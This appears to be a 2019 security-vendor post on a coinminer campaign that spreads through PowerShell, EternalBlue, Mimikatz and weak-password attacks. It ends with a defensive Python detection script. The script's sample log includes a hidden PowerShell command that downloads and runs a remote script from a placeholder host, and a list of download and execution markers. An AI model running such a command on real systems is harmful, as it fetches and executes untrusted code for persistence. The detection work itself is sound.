Delaware, USA – April 15, 2019 – Despite the drop in the Monero price and the shutdown of the Coinhive service, adversaries have not lost interest in coinminers and continue to modify them to attack organizations. Last week it became known that a sophisticated coinminer had hit Hoya Corporation, causing roughly a 40% drop in production. After analyzing the malware, researchers from Trend Micro found that it had also been used in attacks on organizations in Australia, India, Taiwan, Vietnam, and Hong Kong. The first campaign using this coinminer targeted China this January, but within a couple of months the cybercriminals expanded its propagation and infection capabilities and launched a new campaign. The discovered strain uses PowerShell scripts for stealthy initial access and for gaining a foothold on the system, and it creates a scheduled task that periodically downloads a fresh copy of the malware. Its primary method of spreading across the network after the initial compromise is a dictionary attack using a list of weak credentials. In addition, the malware is armed with the EternalBlue exploit (the SMBv1 flaw Microsoft patched in MS17-010 back in March 2017, so unpatched hosts remain the ones at risk) and a PowerShell implementation of the Mimikatz tool for harvesting credentials from memory.
The adversaries have built sophisticated self-propagating malware whose main purpose is to install XMRig on as many systems as possible in the organization’s network. Miners that spread across a network with the EternalBlue exploit first appeared almost a year and a half ago, but the recently spotted combination of self-propagation tooling with PowerShell abuse is considerably more dangerous, because credential-based lateral movement works even on hosts that are fully patched against MS17-010. To detect such attacks at an early stage, before they cause significant damage to the organization, you can use the Brute Force Detection rule pack, which identifies unauthorized access attempts made with various brute-force techniques: https://my.socprime.com/en/integrations/brute-force-detection-hpe-arcsight
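As an added example (this is not code from the article, the SOC Prime rule pack, or Trend Micro's analysis), the following Python script shows the two detections that matter for this campaign, run over a handful of constructed Windows Security events: a dictionary attack from one source host against several accounts followed by a successful network logon (the lateral-movement step), and a scheduled-task creation whose command runs PowerShell with a download or in-memory execution primitive (the re-download persistence step). The event schema, thresholds, IP addresses and the URL are all assumptions made for the example; the event IDs 4625, 4624 and 4698 are the standard Windows Security audit IDs for failed logon, successful logon and scheduled-task creation.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). The field names are an assumption;
# a SIEM would normally supply them from the parsed Windows Security log.
# 4625 = failed logon, 4624 = successful logon, 4698 = scheduled task created.
SAMPLE_LOG = """
{"time": "2019-04-10T02:00:01", "id": 4625, "src": "10.0.0.5", "user": "administrator", "logon_type": 3}
{"time": "2019-04-10T02:00:02", "id": 4625, "src": "10.0.0.5", "user": "administrator", "logon_type": 3}
{"time": "2019-04-10T02:00:03", "id": 4625, "src": "10.0.0.5", "user": "admin", "logon_type": 3}
{"time": "2019-04-10T02:00:04", "id": 4625, "src": "10.0.0.5", "user": "admin", "logon_type": 3}
{"time": "2019-04-10T02:00:05", "id": 4625, "src": "10.0.0.5", "user": "backup", "logon_type": 3}
{"time": "2019-04-10T02:00:06", "id": 4625, "src": "10.0.0.5", "user": "backup", "logon_type": 3}
{"time": "2019-04-10T02:00:09", "id": 4624, "src": "10.0.0.5", "user": "backup", "logon_type": 3}
{"time": "2019-04-10T02:00:20", "id": 4698, "src": "-", "user": "backup", "task": "Update", "command": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"}
{"time": "2019-04-10T08:15:00", "id": 4625, "src": "10.0.0.22", "user": "jsmith", "logon_type": 2}
{"time": "2019-04-10T08:15:30", "id": 4625, "src": "10.0.0.22", "user": "jsmith", "logon_type": 2}
{"time": "2019-04-10T08:16:00", "id": 4624, "src": "10.0.0.22", "user": "jsmith", "logon_type": 2}
{"time": "2019-04-10T09:00:00", "id": 4698, "src": "-", "user": "svc_backup", "task": "NightlyBackup", "command": "backup.exe /full"}
"""

# Strings that indicate PowerShell fetching or executing code rather than running a script file.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                    "iex ", "invoke-expression", "-enc", "-encodedcommand")


def parse_events(text):
    """Parse one JSON event per line and return them sorted by timestamp."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["time"] = datetime.fromisoformat(ev["time"])
        events.append(ev)
    return sorted(events, key=lambda e: e["time"])


def find_dictionary_attacks(events, window=timedelta(minutes=5), min_failures=5, min_accounts=2):
    """Flag a source that produced >= min_failures failed logons against >= min_accounts
    distinct accounts inside `window`. A single user mistyping a password trips neither
    threshold; a dictionary run against several accounts trips both. If a successful
    logon for one of the tried accounts follows from the same source inside the window,
    report it as the compromised account (the lateral-movement step)."""
    by_src = defaultdict(list)
    for ev in events:
        if ev["id"] in (4624, 4625) and ev["src"] != "-":
            by_src[ev["src"]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        failures = [e for e in evs if e["id"] == 4625]
        for i, first in enumerate(failures):
            burst = [e for e in failures[i:] if e["time"] - first["time"] <= window]
            users = {e["user"] for e in burst}
            if len(burst) >= min_failures and len(users) >= min_accounts:
                compromised = next(
                    (e["user"] for e in evs
                     if e["id"] == 4624 and e["user"] in users
                     and first["time"] <= e["time"] <= first["time"] + window),
                    None)
                alerts.append({"src": src, "failures": len(burst),
                               "accounts": sorted(users), "compromised": compromised})
                break  # one alert per source is enough for triage
    return alerts


def find_downloader_tasks(events):
    """Flag scheduled-task creations (4698) whose command invokes PowerShell with a
    download or in-memory execution primitive, the re-download persistence pattern."""
    hits = []
    for ev in events:
        if ev["id"] != 4698:
            continue
        cmd = ev.get("command", "").lower()
        if "powershell" in cmd and any(m in cmd for m in DOWNLOAD_MARKERS):
            hits.append({"task": ev["task"], "user": ev["user"], "command": ev["command"]})
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for a in find_dictionary_attacks(evs):
        print(f"dictionary attack from {a['src']}: {a['failures']} failures over "
              f"{a['accounts']}, compromised={a['compromised']}")
    for t in find_downloader_tasks(evs):
        print(f"suspicious task '{t['task']}' created by {t['user']}: {t['command']}")
```

On the sample data only 10.0.0.5 is flagged, with the `backup` account reported as compromised, while the two failed logons from 10.0.0.22 are ignored as ordinary user error; the `Update` task is reported because its command pulls and executes a script from the network, whereas the backup job is not. In a SIEM the same logic maps onto a correlation rule keyed on source address with an aggregation window, and the thresholds should be tuned against a baseline of the environment's normal failed-logon volume before alerting is enabled.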